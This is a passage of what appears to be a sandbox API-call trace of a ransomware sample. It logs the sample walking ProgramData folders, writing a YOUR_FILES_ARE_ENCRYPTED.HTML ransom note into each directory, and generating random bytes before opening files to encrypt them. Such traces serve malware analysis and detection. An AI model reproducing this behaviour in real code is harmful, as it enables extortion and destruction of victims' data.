returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*" [0157.199] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe94970d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.199] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, 
ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe94970d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.199] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe94970d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.199] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.199] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0157.199] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\data\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.200] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.202] CloseHandle (hObject=0x58c) returned 1 [0157.203] GetProcessHeap () returned 0x270000 [0157.203] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.203] 
FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0ebc510, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0ebc510, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 0 [0157.203] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.204] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0157.204] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.204] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.206] CloseHandle (hObject=0x5a0) returned 1 [0157.207] GetProcessHeap () returned 0x270000 [0157.208] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.208] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd0f087d0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd0f087d0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="Data", cAlternateFileName="")) returned 0 [0157.208] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.208] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0157.208] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.208] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.211] CloseHandle (hObject=0x598) returned 1 [0157.211] GetProcessHeap () returned 0x270000 [0157.212] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.221] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0157.221] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures") returned 50 [0157.221] GetProcessHeap () returned 0x270000 [0157.221] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.223] 
lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures" [0157.223] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*" [0157.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.224] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.224] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd282d030, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="5AlR3U30D3.dat", cAlternateFileName="5ALR3U~1.DAT")) returned 1 [0157.224] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5AlR3U30D3.dat") returned 65 [0157.224] lstrcmpW (lpString1="5AlR3U30D3.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.225] PathFindExtensionW (pszPath="5AlR3U30D3.dat") returned=".dat" [0157.225] lstrlenW (lpString=".dat") returned 4 [0157.225] PathFindExtensionW (pszPath="5AlR3U30D3.dat") returned=".dat" [0157.225] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0157.225] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5AlR3U30D3.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5alr3u30d3.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0157.225] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=0) returned 1 [0157.225] CloseHandle (hObject=0x5a0) returned 1 [0157.226] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe51400a2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe51400a2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0157.226] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures") returned 67 [0157.226] GetProcessHeap () 
returned 0x270000 [0157.226] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.227] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures" [0157.227] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*" [0157.227] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe51400a2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe51400a2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.230] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe51400a2, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe51400a2, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0157.230] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x5270cf0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5270cf0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf171085c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0157.230] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned 82 [0157.230] lstrcmpW (lpString1="usertile10.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.230] PathFindExtensionW (pszPath="usertile10.bmp") returned=".bmp" [0157.230] lstrlenW (lpString=".bmp") returned 4 [0157.230] PathFindExtensionW (pszPath="usertile10.bmp") returned=".bmp" [0157.230] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5270cf0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5270cf0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf17369bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0157.230] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned 82 [0157.231] lstrcmpW (lpString1="usertile11.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.231] PathFindExtensionW (pszPath="usertile11.bmp") returned=".bmp" [0157.231] lstrlenW (lpString=".bmp") returned 4 [0157.231] PathFindExtensionW (pszPath="usertile11.bmp") returned=".bmp" [0157.231] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52733076, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52733076, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1c4587c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0157.231] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned 82 [0157.231] lstrcmpW (lpString1="usertile12.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.231] PathFindExtensionW (pszPath="usertile12.bmp") returned=".bmp" [0157.231] lstrlenW (lpString=".bmp") returned 4 [0157.231] PathFindExtensionW (pszPath="usertile12.bmp") returned=".bmp" [0157.231] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527591de, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527591de, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1c4587c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0157.231] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned 82 [0157.231] lstrcmpW (lpString1="usertile13.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.231] PathFindExtensionW (pszPath="usertile13.bmp") returned=".bmp" [0157.231] lstrlenW (lpString=".bmp") returned 4 [0157.231] PathFindExtensionW (pszPath="usertile13.bmp") returned=".bmp" [0157.231] FindNextFileW (in: 
hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527591de, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527591de, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1e5abbc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0157.231] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned 82 [0157.231] lstrcmpW (lpString1="usertile14.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.231] PathFindExtensionW (pszPath="usertile14.bmp") returned=".bmp" [0157.231] lstrlenW (lpString=".bmp") returned 4 [0157.231] PathFindExtensionW (pszPath="usertile14.bmp") returned=".bmp" [0157.231] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5277f346, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5277f346, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1e80d1c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0157.231] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned 82 [0157.232] lstrcmpW (lpString1="usertile15.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.232] PathFindExtensionW (pszPath="usertile15.bmp") returned=".bmp" [0157.232] lstrlenW (lpString=".bmp") returned 4 [0157.232] PathFindExtensionW (pszPath="usertile15.bmp") 
returned=".bmp" [0157.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527a54ae, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527a54ae, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ea6e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0157.232] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned 82 [0157.232] lstrcmpW (lpString1="usertile16.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.232] PathFindExtensionW (pszPath="usertile16.bmp") returned=".bmp" [0157.232] lstrlenW (lpString=".bmp") returned 4 [0157.232] PathFindExtensionW (pszPath="usertile16.bmp") returned=".bmp" [0157.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527cb616, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527cb616, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ea6e7c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0157.232] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned 82 [0157.232] lstrcmpW (lpString1="usertile17.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.232] PathFindExtensionW (pszPath="usertile17.bmp") returned=".bmp" [0157.232] lstrlenW (lpString=".bmp") returned 4 [0157.232] 
PathFindExtensionW (pszPath="usertile17.bmp") returned=".bmp" [0157.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527cb616, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527cb616, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1eccfdc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0157.232] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp") returned 82 [0157.232] lstrcmpW (lpString1="usertile18.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.232] PathFindExtensionW (pszPath="usertile18.bmp") returned=".bmp" [0157.232] lstrlenW (lpString=".bmp") returned 4 [0157.232] PathFindExtensionW (pszPath="usertile18.bmp") returned=".bmp" [0157.232] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527f177e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527f177e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1ef313c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile19.bmp", cAlternateFileName="")) returned 1 [0157.233] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp") returned 82 [0157.233] lstrcmpW (lpString1="usertile19.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.233] PathFindExtensionW (pszPath="usertile19.bmp") returned=".bmp" [0157.233] lstrlenW 
(lpString=".bmp") returned 4 [0157.233] PathFindExtensionW (pszPath="usertile19.bmp") returned=".bmp" [0157.233] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x527f177e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x527f177e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f1929c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile20.bmp", cAlternateFileName="")) returned 1 [0157.233] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp") returned 82 [0157.233] lstrcmpW (lpString1="usertile20.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.233] PathFindExtensionW (pszPath="usertile20.bmp") returned=".bmp" [0157.233] lstrlenW (lpString=".bmp") returned 4 [0157.233] PathFindExtensionW (pszPath="usertile20.bmp") returned=".bmp" [0157.233] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x528178e6, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x528178e6, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1f1929c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile21.bmp", cAlternateFileName="")) returned 1 [0157.233] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile21.bmp") returned 82 [0157.233] lstrcmpW (lpString1="usertile21.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.233] PathFindExtensionW 
